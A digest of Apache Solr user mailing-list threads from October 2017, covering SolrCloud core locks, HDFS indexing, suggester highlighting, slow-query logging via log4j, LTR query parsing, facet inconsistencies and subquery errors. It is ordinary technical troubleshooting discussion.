SOLR cores are getting locked

2017-10-12 Thread Gunalan V
Hello,

I'm using SOLR 6.5.1 and I have 2 SOLR nodes in SOLRCloud and created
collection using the below [1] and it was created successfully during
initial time but next day I tried to restart the nodes in SOLR cloud. When
I start the first node the collection health is active but when I start the
second node the collection is became down and could see the locks in the
logs [2].

Also I have the set the solr home in zookeeper using the command [3].

Did anyone came across this issue? If so please let me know how to fix it.


[1]
http://localhost:8983/solr/admin/collections?action=CREATE&name=testcollection&numShards=2&replicationFactor=2&maxShardsPerNode=2&collection.configName=testconfigs


[2]  Caused by: org.apache.lucene.store.LockObtainFailedException: Index
dir
'/data01/solr/solr-6.5.1/server/solr/testcollection_shard1_replica2/data/index/'
of core 'testcollection_shard1_replica2' is already locked. The most likely
cause is another Solr server (or another solr core in this server) also
configured to use this directory; other possible causes may be specific to
lockType: native
at org.apache.solr.core.SolrCore.initIndex(SolrCore.java:713)


[3]  ./solr zk cp file:/data01/solr/solr-6.5.1/server/solr/solr.xml
zk:/solr.xml -z 10.120.166.12:2181,10.120.166.12:2182,10.120.166.12:2183



Thanks,
GVK


Re: Indexing files from HDFS

2017-10-12 Thread István
Hi Erik,

The question is not about Hue but about why file_path is in the schema for
HDFS files when using search-mr. I am wondering what is the standard way of
indexing files on HDFS.

THanks,
Istvan

On Wed, Oct 11, 2017 at 4:53 PM, Erick Erickson 
wrote:

> You probably get much more informed responses from
> the Cloudera folks, especially about Hue.
>
> Best,
> Erick
>
> On Wed, Oct 11, 2017 at 6:05 AM, István  wrote:
> > Hi,
> >
> > I have Solr 4.10.3 part of a CDH5 installation and I would like to index
> > huge amount of CSV files on HDFS. I was wondering what is the best way of
> > doing that.
> >
> > Here is the current approach:
> >
> > data.csv:
> >
> > id, fruit
> > 10, apple
> > 20, orange
> >
> > Indexing with the following command using search-mr-1.0.0-cdh5.11.1-job.
> jar
> >
> > hadoop --config /etc/hadoop/conf.cloudera.yarn jar \
> > /opt/cloudera/parcels/CDH/lib/solr/contrib/mr/search-mr-1.0.
> 0-cdh5.11.1-job.jar
> > \
> > org.apache.solr.hadoop.MapReduceIndexerTool \
> > -D 'mapred.child.java.opts=-Xmx500m' --log4j \
> > /opt/cloudera/parcels/CDH/share/doc/search/examples/
> solr-nrt/log4j.properties
> > --morphline-file \
> > /home/user/readCSV.conf \
> > --output-dir hdfs://name-node.server.com:8020/user/solr/output --verbose
> > --go-live \
> > --zk-host name-node.server.com:2181/solr --collection collection0 \
> > hdfs://name-node.server.com:8020/user/solr/input
> >
> > This leads to the following exception:
> >
> > 2219 [main] INFO  org.apache.solr.hadoop.MapReduceIndexerTool  -
> Indexing 1
> > files using 1 real mappers into 1 reducers
> > Error: java.io.IOException: Batch Write Failure
> > at org.apache.solr.hadoop.BatchWriter.throwIf(
> BatchWriter.java:239)
> > ..
> > Caused by: org.apache.solr.common.SolrException: ERROR: [doc=100]
> unknown
> > field 'file_path'
> > at
> > org.apache.solr.update.DocumentBuilder.toDocument(
> DocumentBuilder.java:185)
> > at
> > org.apache.solr.update.AddUpdateCommand.getLuceneDocument(
> AddUpdateCommand.java:78)
> >
> > It appears to me that the schema does not have file_path. The collection
> is
> > created through Hue and it properly identifies the two fields id and
> fruit.
> > I found out that the search-mr tool has the following code that
> references
> > the file_path:
> >
> > https://github.com/cloudera/search/blob/cdh5-1.0.0_5.2.0/
> search-mr/src/main/java/org/apache/solr/hadoop/HdfsFileFieldNames.java#L30
> >
> > I am not sure what to do in order to be able to index files on HDFS. I
> have
> > two guesses:
> >
> > - add the fields definied in the search tool to the schema when I create
> it
> > (not sure how that work through Hue)
> > - disable the HDFS meatadata insertion when inserting data
> >
> > Has anybody seen this before?
> >
> > Thanks,
> > Istvan
> >
> >
> >
> >
> > --
> > the sun shines for all
>



-- 
the sun shines for all


Suggester highlighter offsets inaccurate

2017-10-12 Thread Timothy Hill
Hello,

I am using Solr 6.6's Suggester functionality to power an autosuggest
widget that returns lists of people's names.

One requirement that we have is that the suggester be
punctuation-insensitive. For example, entering:

'Dr Joh' should provide the suggestion 'Dr. John', despite the fact that
the user omitted the period after 'dr'.

'Hank Williams Jr' should provide the suggestion 'Hank Williams, Jr.'
despite the omission of both the comma and the period.

This functionality is present - but the punctuation-stripping appears to be
causing highlighting offsets to be miscalculated: we end up with 'Dr
John' for the first query and 'Hank Williams, Jr.' for the second

Here's are the relevant parts of the solrconfig.xml and schema.xml
configurations:




suggestEntity
AnalyzingInfixLookupFactory
DocumentDictionaryFactory
skos_prefLabel
derived_score
payload
suggestType
2
false
false
true
suggest_filters




true
true
10
suggestEntity


suggestEntity













As you can see from the schema.xml document, I've tried storing term
vectors, offsets, etc., but the Suggester highlighter doesn't seem to take
advantage of them.

Does anyone know what I'm doing wrong here? Or is this a bug in the
highlighter?

Thanks,

Tim Hill


Re: Need help with Slow Query Logging

2017-10-12 Thread Emir Arnautović
Hi Atita,
I did not have time to try it out, but will try to do it over the weekend if 
you are still having troubles with it.

Regards,
Emir
--
Monitoring - Log Management - Alerting - Anomaly Detection
Solr & Elasticsearch Consulting Support Training - http://sematext.com/



> On 10 Oct 2017, at 19:59, Atita Arora  wrote:
> 
> No luck for me , did you give it a try meantime ?
> M not sure , if I may have missed something , my logs are completely gone
> after this change.
> 
> Wondering whats wrong with them.
> 
> -Atita
> 
> On Tue, Oct 10, 2017 at 5:58 PM, Atita Arora  wrote:
> 
>> Sure thanks Emir,
>> Let me give them a quick try and I'll update you.
>> 
>> Thanks,
>> Atita
>> 
>> On Tue, Oct 10, 2017 at 5:28 PM, Emir Arnautović <
>> emir.arnauto...@sematext.com> wrote:
>> 
>>> Hi Atita,
>>> I did not try it, but I think that following could work:
>>> 
>>> 
>>> #logging queries
>>> log4j.logger.org.apache.solr.handler.component.QueryComponent=WARN,slow
>>> 
>>> log4j.appender.slow=org.apache.log4j.RollingFileAppender
>>> log4j.appender.slow.File=${solr.log}/slow.log
>>> log4j.appender.slow.layout=org.apache.log4j.EnhancedPatternLayout
>>> log4j.appender.slow.layout.ConversionPattern=%d{-MM-dd HH:mm:ss.SSS}
>>> %-5p (%t) [%X{collection} %X{shard} %X{replica} %X{core}] %c{1.} %m%n
>>> 
>>> If you want to log all queries, you can change level for query component
>>> to INFO.
>>> 
>>> HTH,
>>> Emir
>>> --
>>> Monitoring - Log Management - Alerting - Anomaly Detection
>>> Solr & Elasticsearch Consulting Support Training - http://sematext.com/
>>> 
>>> 
>>> 
 On 10 Oct 2017, at 13:35, Atita Arora  wrote:
 
 Hi Emir,
 
 So I made few changes to the log4j config , I am able to redirect these
 logs to another file as well.
 But as these are the WARN logs so I doubt any logs enabled at WARN level
 are going to be redirected here in this new log file.
 So precisely , I am using Solr 6.1 (in cloud mode) & I have made few
>>> more
 changes to the logging levels and components.
 Please find my log4j at : *https://pastebin.com/uTLAiBE5
 *
 
 Any help on this will surely be appreciated.
 
 Thanks again.
 
 Atita
 
 
 On Tue, Oct 10, 2017 at 1:39 PM, Emir Arnautović <
 emir.arnauto...@sematext.com> wrote:
 
> Hi Atita,
> You should definetely go with log4j configuration as anything else
>>> would
> be redoing what log4j can do. You already have
>>> slowQueryThresholdMillies to
> make slow queries log with WARN and you can configure log4j to put such
> logs (class + level) to a separate file.
> This seems like frequent question and not sure why putting logs to
> separate file is not a default configuration - maybe it would make
>>> things
> bit more complicated with logs view in admin console…
> If get stuck, let me know (+ Solr version) and I’ll play a bit and send
> you configs.
> 
> HTH,
> Emir
> --
> Monitoring - Log Management - Alerting - Anomaly Detection
> Solr & Elasticsearch Consulting Support Training -
>>> http://sematext.com/
> 
> 
> 
>> On 9 Oct 2017, at 16:27, Atita Arora  wrote:
>> 
>> Hi ,
>> 
>> I have a situation here where I am required to log the slow queries
>>> into
> a
>> seperate log file which then can be used for optimization purposes.
>> For now this log is aggregated into the mainstream log marking
>> [slow:..].
>> I looked into the code and the configuration and I am really clueless
>>> as
> to
>> how do I go about seperating the slow query logs as it needs another
>>> file
>> appender
>> to be created other than the one already present in the log4j.
>> If I create another appender I can do so by degregating through log
> levels
>> , so that moves all the WARN logs to another file (which is not what
>>> I am
>> looking for).
>> Also from the code prespective , I feel how about if I introduce
>>> another
>> config setting along with the slowQueryThresholdMillis value ,
>>> something
>> like
>> 
>> slowQueryLogFile = get("query/slowQueryLogFile", logfilepath);
>> 
>> 
>> where slowQueryLogFile and if present it logs into this file
>>> otherwise it
>> works on the already present along with
>> 
>> slowQueryThresholdMillis = getInt("query/slowQueryThresholdMillis",
>>> -1);
>> 
>> 
>> or should I tweak log4j ?
>> I am not sure if anyone has done that before or have any pointers to
> guide
>> me on this.
>> Please help.
>> 
>> Thanks in advance,
>> Atita
> 
> 
>>> 
>>> 
>> 



RE: Parsing of rq queries in LTR

2017-10-12 Thread alessandro.benedetti
I don't think this is actually that much related to LTR Solr Feature.
In the Solr feature I see you specify a query with a specific query parser
(field).
Unless there is a bug in the SolrFeature for LTR, I expect the query parser
you defined to be used[1].

This means :

"rawquerystring":"{!field f=full_name}alessandro benedetti",
"querystring":"{!field f=full_name}alessandro benedetti",
"parsedquery":"PhraseQuery(full_name:\"alessandro benedetti\")",
"parsedquery_toString":"full_name:\"alessandro benedetti\"",

In relation to multi term EFI, you need to pass 
efi.example='term1 term2' .
If not just one term will be passed as EFI.[2]
This is more likely to be your problem.
I don't think the dash should be relevant at all

[1]
https://lucene.apache.org/solr/guide/6_6/other-parsers.html#OtherParsers-FieldQueryParser
[2] https://issues.apache.org/jira/browse/SOLR-11386




-
---
Alessandro Benedetti
Search Consultant, R&D Software Engineer, Director
Sease Ltd. - www.sease.io
--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Need help with Slow Query Logging

2017-10-12 Thread Atita Arora
Indeed , the trouble hasn't got over yet.
So we got
https://issues.apache.org/jira/browse/SOLR-11453

created meantime.

I'll look forward to your updates.

Thanks again ,
Atita

On Thu, Oct 12, 2017 at 2:08 PM, Emir Arnautović <
emir.arnauto...@sematext.com> wrote:

> Hi Atita,
> I did not have time to try it out, but will try to do it over the weekend
> if you are still having troubles with it.
>
> Regards,
> Emir
> --
> Monitoring - Log Management - Alerting - Anomaly Detection
> Solr & Elasticsearch Consulting Support Training - http://sematext.com/
>
>
>
> > On 10 Oct 2017, at 19:59, Atita Arora  wrote:
> >
> > No luck for me , did you give it a try meantime ?
> > M not sure , if I may have missed something , my logs are completely gone
> > after this change.
> >
> > Wondering whats wrong with them.
> >
> > -Atita
> >
> > On Tue, Oct 10, 2017 at 5:58 PM, Atita Arora 
> wrote:
> >
> >> Sure thanks Emir,
> >> Let me give them a quick try and I'll update you.
> >>
> >> Thanks,
> >> Atita
> >>
> >> On Tue, Oct 10, 2017 at 5:28 PM, Emir Arnautović <
> >> emir.arnauto...@sematext.com> wrote:
> >>
> >>> Hi Atita,
> >>> I did not try it, but I think that following could work:
> >>>
> >>>
> >>> #logging queries
> >>> log4j.logger.org.apache.solr.handler.component.
> QueryComponent=WARN,slow
> >>>
> >>> log4j.appender.slow=org.apache.log4j.RollingFileAppender
> >>> log4j.appender.slow.File=${solr.log}/slow.log
> >>> log4j.appender.slow.layout=org.apache.log4j.EnhancedPatternLayout
> >>> log4j.appender.slow.layout.ConversionPattern=%d{-MM-dd
> HH:mm:ss.SSS}
> >>> %-5p (%t) [%X{collection} %X{shard} %X{replica} %X{core}] %c{1.} %m%n
> >>>
> >>> If you want to log all queries, you can change level for query
> component
> >>> to INFO.
> >>>
> >>> HTH,
> >>> Emir
> >>> --
> >>> Monitoring - Log Management - Alerting - Anomaly Detection
> >>> Solr & Elasticsearch Consulting Support Training -
> http://sematext.com/
> >>>
> >>>
> >>>
>  On 10 Oct 2017, at 13:35, Atita Arora  wrote:
> 
>  Hi Emir,
> 
>  So I made few changes to the log4j config , I am able to redirect
> these
>  logs to another file as well.
>  But as these are the WARN logs so I doubt any logs enabled at WARN
> level
>  are going to be redirected here in this new log file.
>  So precisely , I am using Solr 6.1 (in cloud mode) & I have made few
> >>> more
>  changes to the logging levels and components.
>  Please find my log4j at : *https://pastebin.com/uTLAiBE5
>  *
> 
>  Any help on this will surely be appreciated.
> 
>  Thanks again.
> 
>  Atita
> 
> 
>  On Tue, Oct 10, 2017 at 1:39 PM, Emir Arnautović <
>  emir.arnauto...@sematext.com> wrote:
> 
> > Hi Atita,
> > You should definetely go with log4j configuration as anything else
> >>> would
> > be redoing what log4j can do. You already have
> >>> slowQueryThresholdMillies to
> > make slow queries log with WARN and you can configure log4j to put
> such
> > logs (class + level) to a separate file.
> > This seems like frequent question and not sure why putting logs to
> > separate file is not a default configuration - maybe it would make
> >>> things
> > bit more complicated with logs view in admin console…
> > If get stuck, let me know (+ Solr version) and I’ll play a bit and
> send
> > you configs.
> >
> > HTH,
> > Emir
> > --
> > Monitoring - Log Management - Alerting - Anomaly Detection
> > Solr & Elasticsearch Consulting Support Training -
> >>> http://sematext.com/
> >
> >
> >
> >> On 9 Oct 2017, at 16:27, Atita Arora  wrote:
> >>
> >> Hi ,
> >>
> >> I have a situation here where I am required to log the slow queries
> >>> into
> > a
> >> seperate log file which then can be used for optimization purposes.
> >> For now this log is aggregated into the mainstream log marking
> >> [slow:..].
> >> I looked into the code and the configuration and I am really
> clueless
> >>> as
> > to
> >> how do I go about seperating the slow query logs as it needs another
> >>> file
> >> appender
> >> to be created other than the one already present in the log4j.
> >> If I create another appender I can do so by degregating through log
> > levels
> >> , so that moves all the WARN logs to another file (which is not what
> >>> I am
> >> looking for).
> >> Also from the code prespective , I feel how about if I introduce
> >>> another
> >> config setting along with the slowQueryThresholdMillis value ,
> >>> something
> >> like
> >>
> >> slowQueryLogFile = get("query/slowQueryLogFile", logfilepath);
> >>
> >>
> >> where slowQueryLogFile and if present it logs into this file
> >>> otherwise it
> >> works on the already present along with
> >>
> >> slowQueryThresholdMillis = getInt("query/slowQueryThreshold

Re: tf function query

2017-10-12 Thread Dmitry Kan
sorry guys to have not been responding & thanks a lot for answers.

@Erick Erickson: what I would ideally like to have is tf-idf value for
user's query. The thing is that we have two searchable fields. While boost
works just fine for one, there is no easy way to have it multiplied by
boost from another field (with current parser).

@Erik Hatcher: interesting idea, how have I missed it :) Is there a way to
capture the value and push it through to other field's boost function?

Thanks a bunch,

Dmitry

On Thu, Oct 5, 2017 at 4:53 PM, Erick Erickson 
wrote:

> What would you  expect as output? tf(field, "a OR b AND c NOT d"). I'm
> not sure what term frequency would even mean in that situation.
>
> tf is a pretty simple function, it expects a single term and there's
> now way I know of to do what you're asking.
>
> Best,
> Erick
>
> On Thu, Oct 5, 2017 at 3:14 AM, Dmitry Kan  wrote:
> > Hi,
> >
> > According to
> > https://lucene.apache.org/solr/guide/6_6/function-
> queries.html#FunctionQueries-AvailableFunctions
> >
> > tf(field, term) requires a term as a second parameter. Is there a
> > possibility to pass in an entire input query (multiterm and boolean) to
> the
> > function?
> >
> > The context here is that we don't use edismax parser to apply multifield
> > boosts, but instead use a custom ranking function.
> >
> > Would appreciate any thoughts,
> >
> > Dmitry
> >
> > --
> > Dmitry Kan
> > Luke Toolbox: http://github.com/DmitryKey/luke
> > Blog: http://dmitrykan.blogspot.com
> > Twitter: http://twitter.com/dmitrykan
> > SemanticAnalyzer: https://semanticanalyzer.info
>



-- 
Dmitry Kan
Luke Toolbox: http://github.com/DmitryKey/luke
Blog: http://dmitrykan.blogspot.com
Twitter: http://twitter.com/dmitrykan
SemanticAnalyzer: https://semanticanalyzer.info


Re: Inconsistent results for facet queries

2017-10-12 Thread Chris Ulicny
I thought that decision would come back to bite us somehow. At the time, we
didn't have enough space available to do a fresh reindex alongside the old
collection, so the only course of action available was to index over the
old one, and the vast majority of its use worked as expected.

We're planning on upgrading to version 7 at some point in the near future
and will have enough space to do a full, clean reindex at that time.

bq: This can propagate through all following segment merges IIUC.

It is exceedingly unfortunate that reindexing the data on that shard only
probably won't end up fixing the problem.

Out of curiosity, are there any good write-ups or documentation on how two
(or more) lucene segments are merged, or is it just worth looking at the
source code to figure that out?

Thanks,
Chris

On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
wrote:

> bq: ...but the collection wasn't emptied first
>
> This is what I'd suspect is the problem. Here's the issue: Segments
> aren't merged identically on all replicas. So at some point you had
> this field indexed without docValues, changed that and re-indexed. But
> the segment merging could "read" the first segment it's going to merge
> and think it knows about docValues for that field, when in fact that
> segment had the old (non-DV) definition.
>
> This would not necessarily be the same on all replicas even on the _same_
> shard.
>
> This can propagate through all following segment merges IIUC.
>
> So my bet is that if you index into a new collection, everything will
> be fine. You can also just delete everything first, but I usually
> prefer a new collection so I'm absolutely and positively sure that the
> above can't happen.
>
> Best,
> Erick
>
> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
> > Hi,
> >
> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
> > Essentially, a standard facet query on a string field usually comes back
> > empty when it shouldn't. However, every now and again the query actually
> > returns the correct values. This is only affecting a single shard in our
> > setup.
> >
> > The behavior pattern generally looks like the query works properly when
> it
> > hasn't been run recently, and then returns nothing after the query seems
> to
> > have been cached (< 50ms QTime). Wait a while and you get the correct
> > result followed by blanks. It doesn't matter which replica of the shard
> is
> > queried; the results are the same.
> >
> > The general query in question looks like
> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
> >
> > The field is defined in the schema as  > docValues="true"/>
> >
> > There are numerous other fields defined similarly, and they do not
> exhibit
> > the same behavior when used as the facet.field value. They consistently
> > return the right results on the shard in question.
> >
> > If we add facet.method=enum to the query, we get the correct results
> every
> > time (though slower. So our assumption is that something is sporadically
> > working when the fc method is chosen by default.
> >
> > A few other notes about the collection. This collection is not freshly
> > indexed, but has not had any particularly bad failures beyond follower
> > replicas going down due to PKIAuthentication timeouts (has been fixed).
> It
> > has also had a full reindex after a schema change added docValues some
> > fields (including the one above), but the collection wasn't emptied
> first.
> > We are using the composite router to co-locate documents.
> >
> > Currently, our plan is just to reindex all of the documents on the
> affected
> > shard to see if that fixes the problem. Any ideas on what might be
> > happening or ways to troubleshoot this are appreciated.
> >
> > Thanks,
> > Chris
>


[Solr 6.6 w/SolrCloud]: Subqueries - Solr returning a 400 status code, Bad Request when attempting to use the [subquery] transformer

2017-10-12 Thread Damien Hawes
Good day,

*Context and background:*

I have a set of documents, that initially are quite deeply nested, but as
part of the pre-index step the documents are flattened, such that they are
at most 2 levels deep - a root document and a list of child documents. Each
child document is given some metadata that indicates its relationship to
other child documents and the root document in the index.

*The current situation:*

There exists a request for me to produce information out of this data, but I
am attempting to return only the relevant fields in the child document(s).
My reading (here and in other sites) as lead me to believe that the [child]
transformer is ill suited for this task - feel free to correct me if I am
wrong.

It seems the [subquery] transformer is what I need, and I have read  this
thread

  
as the post is exactly what I am trying to do

However, when I attempt to do this on my own index, Solr returns a near
useless message. Logging shows the same error.

This is my query:

/select?wt=json&indent=on&q={!parent
which=root_doc_b:true}&rows=1&fq=url:"[hidden
url]"&fq=scan_time:"2017-09-25T19:25:12Z"&fl=url,services:[subquery]&services.q={!child
of=root_doc_b:true}&services.fl=*&services.rows=1&services.fq=service:[* TO
*]

The error given to me:

{
"error": {
"metadata": [
"error-class",
   
"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException",
"root-error-class",
   
"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException"
],
"msg": "Error from server at
http://solr.solr-cluster:8983/solr/scans_shard2_replica1: Bad
Request\n\nrequest:
http://solr.solr-cluster:8983/solr/scans_shard2_replica1/query";,
"code": 400
}
}

I haven't even attempted to use the {!terms} parser with this yet.

Any assistance will be appreciated.

Regards,

Damien Hawes




--
Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Parsing of rq queries in LTR

2017-10-12 Thread Michael Alcorn
It turns out my last comment on that Jira was mistaken. Multi-term EFI
arguments still exhibit unexpected behavior. Binoy is trying to help me
figure out what the issue is. I plan on updating the Jira once we've
figured out the problem.

On Thu, Oct 12, 2017 at 3:41 AM, alessandro.benedetti 
wrote:

> I don't think this is actually that much related to LTR Solr Feature.
> In the Solr feature I see you specify a query with a specific query parser
> (field).
> Unless there is a bug in the SolrFeature for LTR, I expect the query parser
> you defined to be used[1].
>
> This means :
>
> "rawquerystring":"{!field f=full_name}alessandro benedetti",
> "querystring":"{!field f=full_name}alessandro benedetti",
> "parsedquery":"PhraseQuery(full_name:\"alessandro benedetti\")",
> "parsedquery_toString":"full_name:\"alessandro benedetti\"",
>
> In relation to multi term EFI, you need to pass
> efi.example='term1 term2' .
> If not just one term will be passed as EFI.[2]
> This is more likely to be your problem.
> I don't think the dash should be relevant at all
>
> [1]
> https://lucene.apache.org/solr/guide/6_6/other-parsers.html#OtherParsers-
> FieldQueryParser
> [2] https://issues.apache.org/jira/browse/SOLR-11386
>
>
>
>
> -
> ---
> Alessandro Benedetti
> Search Consultant, R&D Software Engineer, Director
> Sease Ltd. - www.sease.io
> --
> Sent from: http://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>


Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
If it's _only_ on a particular replica, here's what you could do:
Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
define the "node" parameter on ADDREPLICA to get it back on the same
node. Then the normal replication process would pull the entire index
down from the leader.

My bet, though, is that this wouldn't really fix things. While it fixes the
particular case you've noticed I'd guess others would pop up. You can
see what replicas return what by firing individual queries at the
particular replica in question with &distrib=false, something like
solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
blah blah


bq: It is exceedingly unfortunate that reindexing the data on that shard only
probably won't end up fixing the problem

Well, we've been working on the DWIM (Do What I Mean) feature for years,
but progress has stalled.

How would that work? You have two segments with vastly different
characteristics for a field. You could change the type, the multiValued-ness,
the analysis chain, there's no end to the things that could go wrong. Fixing
them actually _is_ impossible given how Lucene is structured.

H, you've now given me a brainstorm I'll suggest on the JIRA
system after I talk to the dev list

Consider indexed=true stored=false. After stemming, "running" can be
indexed as "run". At merge time you have no way of knowing that
"running" was the original term so you simply couldn't fix it on merge,
not to mention that the performance penalty would be...er...
severe.

Best,
Erick

On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
> I thought that decision would come back to bite us somehow. At the time, we
> didn't have enough space available to do a fresh reindex alongside the old
> collection, so the only course of action available was to index over the
> old one, and the vast majority of its use worked as expected.
>
> We're planning on upgrading to version 7 at some point in the near future
> and will have enough space to do a full, clean reindex at that time.
>
> bq: This can propagate through all following segment merges IIUC.
>
> It is exceedingly unfortunate that reindexing the data on that shard only
> probably won't end up fixing the problem.
>
> Out of curiosity, are there any good write-ups or documentation on how two
> (or more) lucene segments are merged, or is it just worth looking at the
> source code to figure that out?
>
> Thanks,
> Chris
>
> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
> wrote:
>
>> bq: ...but the collection wasn't emptied first
>>
>> This is what I'd suspect is the problem. Here's the issue: Segments
>> aren't merged identically on all replicas. So at some point you had
>> this field indexed without docValues, changed that and re-indexed. But
>> the segment merging could "read" the first segment it's going to merge
>> and think it knows about docValues for that field, when in fact that
>> segment had the old (non-DV) definition.
>>
>> This would not necessarily be the same on all replicas even on the _same_
>> shard.
>>
>> This can propagate through all following segment merges IIUC.
>>
>> So my bet is that if you index into a new collection, everything will
>> be fine. You can also just delete everything first, but I usually
>> prefer a new collection so I'm absolutely and positively sure that the
>> above can't happen.
>>
>> Best,
>> Erick
>>
>> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
>> > Hi,
>> >
>> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
>> > Essentially, a standard facet query on a string field usually comes back
>> > empty when it shouldn't. However, every now and again the query actually
>> > returns the correct values. This is only affecting a single shard in our
>> > setup.
>> >
>> > The behavior pattern generally looks like the query works properly when
>> it
>> > hasn't been run recently, and then returns nothing after the query seems
>> to
>> > have been cached (< 50ms QTime). Wait a while and you get the correct
>> > result followed by blanks. It doesn't matter which replica of the shard
>> is
>> > queried; the results are the same.
>> >
>> > The general query in question looks like
>> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
>> >
>> > The field is defined in the schema as > > docValues="true"/>
>> >
>> > There are numerous other fields defined similarly, and they do not
>> exhibit
>> > the same behavior when used as the facet.field value. They consistently
>> > return the right results on the shard in question.
>> >
>> > If we add facet.method=enum to the query, we get the correct results
>> every
>> > time (though slower. So our assumption is that something is sporadically
>> > working when the fc method is chosen by default.
>> >
>> > A few other notes about the collection. This collection is not freshly
>> > indexed, but has not had any particularly bad failures beyond follower
>> > replicas going down due to PKIAuthentication

Re: Inconsistent results for facet queries

2017-10-12 Thread Erick Erickson
Never mind. Anything that didn't merge old segments, just threw them
away when empty (which was my idea) would possibly require as much
disk space as the index currently occupied, so doesn't help your
disk-constrained situation.

Best,
Erick

On Thu, Oct 12, 2017 at 8:06 AM, Erick Erickson  wrote:
> If it's _only_ on a particular replica, here's what you could do:
> Just DELETEREPLICA on it, then ADDREPLICA to bring it back. You can
> define the "node" parameter on ADDREPLICA to get it back on the same
> node. Then the normal replication process would pull the entire index
> down from the leader.
>
> My bet, though, is that this wouldn't really fix things. While it fixes the
> particular case you've noticed I'd guess others would pop up. You can
> see what replicas return what by firing individual queries at the
> particular replica in question with &distrib=false, something like
> solr_server:port/solr/collection1_shard1_replica1/query?distrib=false&blah
> blah blah
>
>
> bq: It is exceedingly unfortunate that reindexing the data on that shard only
> probably won't end up fixing the problem
>
> Well, we've been working on the DWIM (Do What I Mean) feature for years,
> but progress has stalled.
>
> How would that work? You have two segments with vastly different
> characteristics for a field. You could change the type, the multiValued-ness,
> the analysis chain, there's no end to the things that could go wrong. Fixing
> them actually _is_ impossible given how Lucene is structured.
>
> H, you've now given me a brainstorm I'll suggest on the JIRA
> system after I talk to the dev list
>
> Consider indexed=true stored=false. After stemming, "running" can be
> indexed as "run". At merge time you have no way of knowing that
> "running" was the original term so you simply couldn't fix it on merge,
> not to mention that the performance penalty would be...er...
> severe.
>
> Best,
> Erick
>
> On Thu, Oct 12, 2017 at 5:53 AM, Chris Ulicny  wrote:
>> I thought that decision would come back to bite us somehow. At the time, we
>> didn't have enough space available to do a fresh reindex alongside the old
>> collection, so the only course of action available was to index over the
>> old one, and the vast majority of its use worked as expected.
>>
>> We're planning on upgrading to version 7 at some point in the near future
>> and will have enough space to do a full, clean reindex at that time.
>>
>> bq: This can propagate through all following segment merges IIUC.
>>
>> It is exceedingly unfortunate that reindexing the data on that shard only
>> probably won't end up fixing the problem.
>>
>> Out of curiosity, are there any good write-ups or documentation on how two
>> (or more) lucene segments are merged, or is it just worth looking at the
>> source code to figure that out?
>>
>> Thanks,
>> Chris
>>
>> On Wed, Oct 11, 2017 at 6:55 PM Erick Erickson 
>> wrote:
>>
>>> bq: ...but the collection wasn't emptied first
>>>
>>> This is what I'd suspect is the problem. Here's the issue: Segments
>>> aren't merged identically on all replicas. So at some point you had
>>> this field indexed without docValues, changed that and re-indexed. But
>>> the segment merging could "read" the first segment it's going to merge
>>> and think it knows about docValues for that field, when in fact that
>>> segment had the old (non-DV) definition.
>>>
>>> This would not necessarily be the same on all replicas even on the _same_
>>> shard.
>>>
>>> This can propagate through all following segment merges IIUC.
>>>
>>> So my bet is that if you index into a new collection, everything will
>>> be fine. You can also just delete everything first, but I usually
>>> prefer a new collection so I'm absolutely and positively sure that the
>>> above can't happen.
>>>
>>> Best,
>>> Erick
>>>
>>> On Wed, Oct 11, 2017 at 12:51 PM, Chris Ulicny  wrote:
>>> > Hi,
>>> >
>>> > We've run into a strange issue with our deployment of solrcloud 6.3.0.
>>> > Essentially, a standard facet query on a string field usually comes back
>>> > empty when it shouldn't. However, every now and again the query actually
>>> > returns the correct values. This is only affecting a single shard in our
>>> > setup.
>>> >
>>> > The behavior pattern generally looks like the query works properly when
>>> it
>>> > hasn't been run recently, and then returns nothing after the query seems
>>> to
>>> > have been cached (< 50ms QTime). Wait a while and you get the correct
>>> > result followed by blanks. It doesn't matter which replica of the shard
>>> is
>>> > queried; the results are the same.
>>> >
>>> > The general query in question looks like
>>> > /select?q=*:*&facet=true&facet.field=market&rows=0&fq=
>>> >
>>> > The field is defined in the schema as >> > docValues="true"/>
>>> >
>>> > There are numerous other fields defined similarly, and they do not
>>> exhibit
>>> > the same behavior when used as the facet.field value. They consistently
>>> > return the right results on the shard 

Re: SOLR cores are getting locked

2017-10-12 Thread Erick Erickson
You might be hitting SOLR-11297, which is fixed in Solr 7.0.1. The
patch should back-port cleanly to 6x versions though.

Best,
Erick

On Thu, Oct 12, 2017 at 12:14 AM, Gunalan V  wrote:
> Hello,
>
> I'm using SOLR 6.5.1 and I have 2 SOLR nodes in SOLRCloud and created
> collection using the below [1] and it was created successfully during
> initial time but next day I tried to restart the nodes in SOLR cloud. When
> I start the first node the collection health is active but when I start the
> second node the collection is became down and could see the locks in the
> logs [2].
>
> Also I have the set the solr home in zookeeper using the command [3].
>
> Did anyone came across this issue? If so please let me know how to fix it.
>
>
> [1]
> http://localhost:8983/solr/admin/collections?action=CREATE&name=testcollection&numShards=2&replicationFactor=2&maxShardsPerNode=2&collection.configName=testconfigs
>
>
> [2]  Caused by: org.apache.lucene.store.LockObtainFailedException: Index
> dir
> '/data01/solr/solr-6.5.1/server/solr/testcollection_shard1_replica2/data/index/'
> of core 'testcollection_shard1_replica2' is already locked. The most likely
> cause is another Solr server (or another solr core in this server) also
> configured to use this directory; other possible causes may be specific to
> lockType: native
> at org.apache.solr.core.SolrCore.initIndex(SolrCore.java:713)
>
>
> [3]  ./solr zk cp file:/data01/solr/solr-6.5.1/server/solr/solr.xml
> zk:/solr.xml -z 10.120.166.12:2181,10.120.166.12:2182,10.120.166.12:2183
>
>
>
> Thanks,
> GVK


